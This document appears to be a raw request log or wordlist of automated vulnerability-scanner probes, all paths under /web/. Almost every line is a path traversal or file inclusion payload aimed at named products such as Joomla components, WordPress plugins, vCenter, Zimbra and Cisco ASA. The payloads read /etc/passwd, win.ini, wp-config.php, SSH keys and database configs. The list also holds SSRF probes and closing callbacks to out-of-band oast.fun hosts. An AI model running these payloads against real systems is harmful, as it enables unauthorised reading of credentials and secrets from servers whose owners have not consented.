/web/wp-content/plugins/church-admin/display/download.php?key=../../../../../../../etc/passwd
/web/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../etc/passwd%00
/web/css/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows\win.ini
/web/index.php?option=com_perchafieldsattach&controller=../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_multiroot&controller=../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_javoice&view=../../../../../../../../../../../../../../../etc/passwd%00
/web/badging/badge_print_v0.php?tpl=../../../../../etc/passwd
/web/?url=http://0177.0.0.1/server-status
/web/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc%5cpasswd
/web/admin/File/DownloadFile?filePath=wwwroot/..././/..././/..././/..././/..././/..././/..././/..././etc/passwd&delete=0
/web/index.php?option=com_perchaimageattach&controller=../../../../../../../../../../etc/passwd%00
/web/secureader/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..
/web/him/api/rest/V1.0/system/log/list?filePath=../
/web/.../.../.../.../.../.../.../.../.../windows/win.ini
/web/glpi/plugins/barcode/front/send.php?file=../../../../../../../../etc/passwd
/web/_plugin/head/../../../../../../../../../../../../../../../../etc/passwd
/web/CFCARD/images/SeleaCamera/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/web/myaccount/javax.faces.resource/web.xml?loc=../WEB-INF
/web/node_modules/../../../../../etc/passwd
/web/Visitor/bin/WebStrings.srf?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini&obj_name=aaa
/web/cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//etc/passwd
/web/img.php?f=/./etc/./passwd
/web/index.php?option=com_hsconfig&controller=../../../../../../../../../../etc/passwd%00
/web/?wpv-image=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
/web/index.php?option=com_abbrev&controller=../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../etc/passwd%00
/web/?host=http://0177.0.0.1/server-status
/web/pacs/nocache.php?path=%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin.ini
/web/base_import/static/c:/windows/win.ini
/web/filemanager/upload.php
/web/static///////../../../../etc/passwd
/web/index.php?option=com_vjdeo&controller=../../../../../../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_svmap&controller=../../../../../../../etc/passwd%00
/web/wp-content/plugins/issuu-panel/menu/documento/requests/ajax-docs.php?abspath=%2Fetc%2Fpasswd
/web/web/static/c:/windows/win.ini
/web/?file=http://0177.0.0.1/etc/passwd
/web/casmain.xgi
/web///../app.js
/web/../../../../../../../../../etc/passwd
/web/(download)/etc/passwd
/web/download.php?file=../../../../../etc/passwd
/web/fcgi-bin/wgsetcgi
/web/index.php?option=com_drawroot&controller=../../../../../../../../../../etc/passwd%00
/web/src/redirect.php?plugins[]=../../../../etc/passwd%00
/web/index.php?option=com_fabrik&controller=../../../../../../../../../../etc/passwd%00
/web/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions
/web/signEzUI/playlist/edit/upload/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd
/web/../../../../../../../../../../../../../etc/passwd
/web/index.php?page=../../../../../../../../../../etc/passwd
/web/index.php?option=com_userstatus&controller=../../../../../../../../../../etc/passwd%00
/web/admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b2t382r1b342p37373b2s
/web/index.php?option=com_jacomment&view=../../../../../../../../../../etc/passwd%00
/web/../../../../../../../../../../../../../etc/passwd
/web/index.php?option=com_dwgraphs&controller=../../../../../../../../etc/passwd%00
/web/fhem/FileLog_logWrapper?dev=Logfile&file=%2fetc%2fpasswd&type=text
/web/assets/file:%2f%2f/etc/passwd
/web/index.php?option=com_zimbcore&controller=../../../../../../../../../../etc/passwd%00
/web/?action=dzsap_download&link=../../../../../../../../../../../../../etc/passwd
/web/index.php?option=com_perchaimageattach&controller=../../../../../../../../../../etc/passwd%00
/web/him/api/rest/V1.0/system/log/list?filePath=../
/web/.../.../.../.../.../.../.../.../.../windows/win.ini
/web/CFCARD/images/SeleaCamera/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/web/index.php?option=com_if_surfalert&controller=../../../../../../../../../../etc/passwd%00
/web/..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini
/web/XMII/Catalog?Mode=GetFileList&Path=Classes/../../../../../../../../../../../../etc/passwd
/web/myaccount/javax.faces.resource/web.xml?loc=../WEB-INF
/web/manage/log/view?filename=/windows/win.ini&base=../../../../../../../../../../
/web/node_modules/../../../../../etc/passwd
/web/index.php?option=com_news_portal&controller=../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_abbrev&controller=../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_hsconfig&controller=../../../../../../../../../../etc/passwd%00
/web/img.php?f=/./etc/./passwd
/web/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd
/web/
/web/myaccount/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..
/web/index.php?option=com_jprojectmanager&controller=../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00
/web/pacs/nocache.php?path=%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin.ini
/web/language/lang
/web%C2%A7endpoint%C2%A7../../../../bin/.ssh_host_rsa_key
/web/filemanager/upload.php
/web/WebMstr7/servlet/mstrWeb?evt=3045&src=mstrWeb.3045&subpage=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
/web/index.php?option=com_svmap&controller=../../../../../../../etc/passwd%00
/web/web/static/c:/windows/win.ini
/web/menu/ss?sid=nsroot&username=nsroot&force_setup=1
/web/base/static/c:/windows/win.ini
/web/index.php?option=com_photobattle&view=../../../../../../../../../../etc/passwd%00
/web/menu/neo
/web/casmain.xgi
/web/menu/stc
/web///../app.js
/web/index.php?option=com_jvideodirect&controller=../../../../../../../../../../etc/passwd%00
/web/wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk
/web/(download)/etc/passwd
/web/../../../../../../../../../etc/passwd
/web/fcgi-bin/wgsetcgi
/web/src/redirect.php?plugins[]=../../../../etc/passwd%00
/web/index.php?option=com_fabrik&controller=../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_fabrik&task=plugin.pluginAjax&plugin=image&g=element&method=onAjax_files&folder=../../../../../../../../../../../../../../../tmp/
/web/seeyon/webmail.do?method=doDownloadAtt&filename=index.jsp&filePath=../conf/datasourceCtp.properties
/web/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions
/web/index.php?option=com_archeryscores&controller=../../../../../../../../../etc/passwd%00
/web/eam/vib?id=C:\ProgramData\VMware\VMware+VirtualCenter\vcdb.properties
/web/analytics/saw.dll?bieehome&startPage=1
/web/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd
/web/index.php?option=com_zimbcore&controller=../../../../../../../../../../etc/passwd%00
/web/index.php?r=i/../../../../../etc/passwd
/web/eam/vib?id=C:\Documents+and+Settings\All+Users\Application+Data\VMware\VMware+VirtualCenter\vcdb.properties
/web/gespage/doDownloadData?file_name=../../../../../Windows/debug/NetSetup.log
/web/index.php?option=com_if_surfalert&controller=../../../../../../../../../../etc/passwd%00
/web/XMII/Catalog?Mode=GetFileList&Path=Classes/../../../../../../../../../../../../etc/passwd
/web/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd
/web/manage/log/view?filename=/windows/win.ini&base=../../../../../../../../../../
/web/eam/vib?id=C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\vcdb.properties
/web/index.php?option=com_news_portal&controller=../../../../../../../../../../etc/passwd%00
/web/typo3conf/ext/restler/vendor/luracast/restler/public/examples/resources/getsource.php?file=../../../../../../../LocalConfiguration.php
/web/log/view?filename=/windows/win.ini&base=../../../../../../../../../../
/web/dompdf.php?input_file=dompdf.php
/web/language/lang
/web/myaccount/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..
/web/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd
/web/cgi-bin/mj_wwwusr?passw=&list=GLOBAL&user=&func=help&extra=/../../../../../../../../etc/passwd
/web/SupportPortlet/faces/javax.faces.resource/web.xml?loc=../WEB-INF
/web%C2%A7endpoint%C2%A7../../../../bin/.ssh_host_rsa_key
/web/index.php?option=com_loginbox&view=../../../../../../../../../etc/passwd%00
/web/tarantella/cgi-bin/secure/ttawlogin.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/passwd
/web/WebMstr7/servlet/mstrWeb?evt=3045&src=mstrWeb.3045&subpage=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
/web/download/index.php?file=../../../../../../../../../etc/passwd
/web/SupportPortlet/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..
/web/base/static/c:/windows/win.ini
/web/index.php?option=com_photobattle&view=../../../../../../../../../../etc/passwd%00
/web/jnoj/web/polygon/problem/viewfile?id=1&name=../../../../../../../etc/passwd
/web/?action=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00
/web/wp-content/plugins/simple-fields/simple_fields.php?wp_abspath=/etc/passwd%00
/web/menu/stc
/web/wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk
/web/index.php?option=com_jvideodirect&controller=../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_omphotogallery&controller=../../../../../../../../../etc/passwd
/web/index.php?option=com_fabrik&task=plugin.pluginAjax&plugin=image&g=element&method=onAjax_files&folder=../../../../../../../../../../../../../../../tmp/
/web/index.php?option=com_sebercart&view=../../../../../../../../../../etc/passwd%00
/web/osclass/oc-admin/index.php?page=appearance&action=render&file=../../../../../../../../../../etc/passwd
/web/%5C../ssl/yaws-key.pem
/web/rapi/filedownload?filter=path:%2Fetc%2Fpasswd
/web/index.php?option=com_jphone&controller=../../../../../../../../../../etc/passwd%00
/web/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/web/index.php?option=com_archeryscores&controller=../../../../../../../../../etc/passwd%00
/web/analytics/saw.dll?bieehome&startPage=1
/web/index.php?option=com_rokdownloads&controller=../../../../../../../../../../etc/passwd%00
/web/analytics/saw.dll?getPreviewImage&previewFilePath=/etc/passwd
/web/index.php?r=i/../../../../../etc/passwd
/web/index.php?option=com_jejob&view=../../../../../../etc/passwd%00
/web/gespage/doDownloadData?file_name=../../../../../Windows/debug/NetSetup.log
/web/index.php?option=com_beeheard&controller=../../../../../../../../../../etc/passwd%00
/web/classes/phpmailer/class.cs_phpmailer.php?classes_dir=../../../../../../../../../../../etc/passwd%00
/web/eam/vib?id=C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\vcdb.properties
/web/index.php?option=com_cmimarketplace&Itemid=70&viewit=/../../../../../../etc/passwd&cid=1
/web/index.php?option=com_imagebrowser&folder=../../../../etc/passwd
/web/index.php?option=com_orgchart&controller=../../../../../../../../../../etc/passwd%00
/web/log/view?filename=/windows/win.ini&base=../../../../../../../../../../
/web/dompdf.php?input_file=dompdf.php
/web/manage/log/view?filename=/etc/passwd&base=../../../../../../../../../../
/web/PhpSpreadsheet/Writer/PDF/DomPDF.php?input_file=dompdf.php
/web/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd
/web/cgi-bin/mj_wwwusr?passw=&list=GLOBAL&user=&func=help&extra=/../../../../../../../../etc/passwd
/web/searchblox/servlet/FileServlet?col=9&url=/etc/passwd
/web/lib/dompdf/dompdf.php?input_file=dompdf.php
/web/theme/default/img/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd
/web/tarantella/cgi-bin/secure/ttawlogin.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/passwd
/web/cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/web/index.php?option=com_shoutbox&controller=../../../../../../../etc/passwd%00
/web/download/index.php?file=../../../../../../../../../etc/passwd
/web/index.php?option=com_jtagmembersdirectory&task=attachment&download_file=../../../../../../../../../../../etc/passwd
/web/SupportPortlet/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..
/web/index.php?option=com_perchadownloadsattach&controller=../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_omphotogallery&controller=../../../../../../../../../etc/passwd
/web/index.php?option=com_joomlaflickr&controller=../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_sebercart&view=../../../../../../../../../../etc/passwd%00
/web/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd
/web/osclass/oc-admin/index.php?page=appearance&action=render&file=../../../../../../../../../../etc/passwd
/web/%5C../ssl/yaws-key.pem
/web/plugins/search/..%5C..%5C..%5Cconf%5Copenfire.xml
/web/index.php?option=com_jphone&controller=../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_projectfork&section=../../../../../../../../etc/passwd
/web/adm/file.cgi?next_file=%2fetc%2fpasswd
/web/admin/index.php?module=file_editor&file=/../../../../../../../../../../../etc/passwd
/web/asd/../../../../../../../../etc/passwd
/web/webEdition/showTempFile.php?file=../../../../etc/passwd
/web/index.php?option=com_jvehicles&controller=../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_rokdownloads&controller=../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_jejob&view=../../../../../../etc/passwd%00
/web/cgi-bin/logoff.cgi
/web/classes/phpmailer/class.cs_phpmailer.php?classes_dir=../../../../../../../../../../../etc/passwd%00
/web/file=C:%5CWindows%5Cwin.ini
/web/wavemaker/studioService.download?method=getContent&inUrl=file///etc/passwd
/web/index.php?option=com_cmimarketplace&Itemid=70&viewit=/../../../../../../etc/passwd&cid=1
/web/index.php?option=com_imagebrowser&folder=../../../../etc/passwd
/web/cgi-bin/webproc
/web/weaver/org.springframework.web.servlet.ResourceServlet?resource=/WEB-INF/web.xml
/web/index.php?option=com_orgchart&controller=../../../../../../../../../../etc/passwd%00
/web/manage/log/view?filename=/etc/passwd&base=../../../../../../../../../../
/web/index.php?option=com_tweetla&controller=../../../../../../../etc/passwd%00
/web/log/view?filename=/etc/passwd&base=../../../../../../../../../../
/web/searchblox/servlet/FileServlet?col=9&url=/etc/passwd
/web/lib/dompdf/dompdf.php?input_file=dompdf.php
/web/index.php?option=com_ultimateportfolio&controller=../../../../../../../../../../etc/passwd%00
/web/includes/dompdf/dompdf.php?input_file=dompdf.php
/web/cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/web/demo/file/../../../../../../../../etc/passwd%00filename.mp4/chunk.m3u8?nimblesessionid=1484448
/web/static/../../../a/../../../../etc/passwd
/web/index.php?option=com_jtagmembersdirectory&task=attachment&download_file=../../../../../../../../../../../etc/passwd
/web/index.php?option=com_perchadownloadsattach&controller=../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../etc/passwd%00
/web/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
/web/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../etc/passwd
/web/a/b/%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd
/web/index.php?option=com_joomlaflickr&controller=../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_graphics&controller=../../../../../../../../../etc/passwd%00
/web/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd
/web/plugins/search/..%5C..%5C..%5Cconf%5Copenfire.xml
/web/wp-content/plugins/tera-charts/charts/zoomabletreemap.php?fn=../../../../../etc/passwd
/web/index.php?id=50&file=../../../../../../../../../etc/passwd
/web/admin/index.php?module=file_editor&file=/../../../../../../../../../../../etc/passwd
/web/index.php?option=com_projectfork&section=../../../../../../../../etc/passwd
/web/adm/file.cgi?next_file=%2fetc%2fpasswd
/web/../conf/config.properties
/web/brightmail/servlet/com.ve.kavachart.servlet.ChartStream?sn=../../WEB-INF/
/web/index.php?option=com_jvehicles&controller=../../../../../../../../../../etc/passwd%00
/web/wp-content/plugins/se-html5-album-audio-player/download_audio.php?file=/wp-content/uploads/../../../../../etc/passwd
/web/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00
/web/webEdition/showTempFile.php?file=../../../../etc/passwd
/web/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/web/index.php?option=com_jukebox&controller=../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_jwhmcs&controller=../../../../../../../../../../etc/passwd%00
/web/login
/web/index.php?option=com_jequoteform&view=../../../../../../etc/passwd%00
/web/wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../../../../../../../../etc/passwd
/web/viewlog.jsp
/web/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd
/web/components/com_ionfiles/download.php?file=../../../../../../../../etc/passwd&download=1
/web/wavemaker/studioService.download?method=getContent&inUrl=file///etc/passwd
/web/index.php/admin/filemanager/sa/getZipFile?path=/../../../../../../../etc/passwd
/web/cgi-bin/webproc
/web/weaver/org.springframework.web.servlet.ResourceServlet?resource=/WEB-INF/web.xml
/web/kvmlm2/index.dhtml?fname=&language=../../../../../../../../../../etc/passwd%00.jpg&lname=&sponsor=gdi&template=11
/web/download.php?file=/etc/passwd
/web/index.php?option=com_tweetla&controller=../../../../../../../etc/passwd%00
/web/jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd
/web/log/view?filename=/etc/passwd&base=../../../../../../../../../../
/web/index.php?option=com_kif_nexus&controller=../../../../../../../../../etc/passwd
/web/index.php?option=com_webtv&controller=../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_ultimateportfolio&controller=../../../../../../../../../../etc/passwd%00
/web/demo/file/../../../../../../../../etc/passwd%00filename.mp4/chunk.m3u8?nimblesessionid=1484448
/web/index.php?option=com_simpledownload&task=download&fileid=../../../../../../../../../../etc/passwd%00
/web/static/../../../a/../../../../etc/passwd
/web/.//WEB-INF/classes/META-INF/microprofile-config.properties
/web/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd
/web/a/b/%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd
/web/jreport/sendfile/help/../../../../../../../../../../../../../../etc/passwd
/web/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../etc/passwd
/web/downloadfile.php?file=../../../../../../../../../../etc/passwd
/web/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../Windows/win.ini
/web/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
/web/uir//etc/passwd
/web/wt3/forceSave.php?file=/etc/passwd
/web/etc/passwd
/web/index.php?option=com_cartweberp&controller=../../../../../../../../etc/passwd
/web/index.php?option=com_perchacategoriestree&controller=../../../../../../../../../../etc/passwd%00
/web/..%5cetc/passwd
/web/..%5c..%5cetc/passwd
/web/..%5c..%5c..%5cetc/passwd
/web/brightmail/servlet/com.ve.kavachart.servlet.ChartStream?sn=../../WEB-INF/
/web/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=../../../../../../../../../../../../etc/passwd
/web/wp-content/plugins/se-html5-album-audio-player/download_audio.php?file=/wp-content/uploads/../../../../../etc/passwd
/web/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00
/web/..%5c..%5c..%5c..%5cetc/passwd
/web/includes/lib/gz.php?file=/themes/../../../../../../../../../etc/passwd
/web/wp-content/plugins/zip-attachments/download.php?za_file=../../../../../etc/passwd&za_filename=passwd
/web/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00
/web/index.php?option=com_jwhmcs&controller=../../../../../../../../../../etc/passwd%00
/web/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd
/web/login
/web/plugins/content/jw_allvideos/includes/download.php?file=../../../../../../../../etc/passwd
/web/index.php?option=com_jequoteform&view=../../../../../../etc/passwd%00
/web/..%5c..%5c..%5c..%5c..%5cetc/passwd
/web/mdocs-posts/?mdocs-img-preview=../../../wp-config.php
/web/wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../../../../../../../../etc/passwd
/web/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd
/web/assets/php/filebrowser/filebrowser.main.php?file=../../../../../../../../../../etc/passwd&do=download
/web/../../../../../../../../windows/win.ini
/web/index.php/admin/filemanager/sa/getZipFile?path=/../../../../../../../etc/passwd
/web/admin/cert_download.php?file=pqpqpqpq.txt&certfile=../../../../../../../../etc/passwd
/web/kvmlm2/index.dhtml?fname=&language=../../../../../../../../../../etc/passwd%00.jpg&lname=&sponsor=gdi&template=11
/web/download.php?file=/etc/passwd
/web/jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd
/web/index.php?option=com_jinventory&controller=../../../../../../../../../../etc/passwd%00
/web/wp-content/plugins/wordfence/lib/wordfenceClass.php?file=/../../../../../../etc/passwd
/web/index.php?option=com_webtv&controller=../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00
/web/actuator/jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd
/web/index.php?option=com_simpledownload&task=download&fileid=../../../../../../../../../../etc/passwd%00
/web/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd
/web/jreport/sendfile/help/../../../../../../../../../../../../../../etc/passwd
/web/downloadfile.php?file=../../../../../../../../../../etc/passwd
/web/uir//etc/passwd
/web/index.php?option=com_cartweberp&controller=../../../../../../../../etc/passwd
/web/index.php?option=com_perchacategoriestree&controller=../../../../../../../../../../etc/passwd%00
/web/includes/lib/gz.php?file=/themes/../../../../../../../../../etc/passwd
/web/wp-content/plugins/zip-attachments/download.php?za_file=../../../../../etc/passwd&za_filename=passwd
/web/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd
/web/..%5c..%5c..%5c..%5c..%5cetc/passwd
/web/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd
/web/mdocs-posts/?mdocs-img-preview=../../../wp-config.php
/web/?mdocs-img-preview=../../../wp-config.php
/web/assets/php/filebrowser/filebrowser.main.php?file=../../../../../../../../../../etc/passwd&do=download
/web/../../../../../../../../windows/win.ini
/web/index.php?option=com_jinventory&controller=../../../../../../../../../../etc/passwd%00
/web/wp-content/plugins/wordfence/lib/wordfenceClass.php?file=/../../../../../../etc/passwd
/web/index.php?option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00
/web/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd
/web/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd
/web/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd
/web/static/..%5cetc/passwd
/web/static/..%5c..%5cetc/passwd
/web/static/..%5c..%5c..%5cetc/passwd
/web/static/..%5c..%5c..%5c..%5cetc/passwd
/web/static/..%5c..%5c..%5c..%5c..%5cetc/passwd
/web/static/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd
/web/static/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd
/web/./../../../../../../../../../../etc/passwd
/web/./../../../../../../../../../../etc/passwd
/web/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd
/web/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd
/web/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./etc/passwd
/web/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd
/web/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
/web/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd
/web/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd
/web/ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=https://c8acfe99m8v8pj25eurgcekcomayyyyyr.oast.fun
/web/?qtproxycall=http://c8acfe99m8v8pj25eurgcekcomayyyyyg.oast.fun
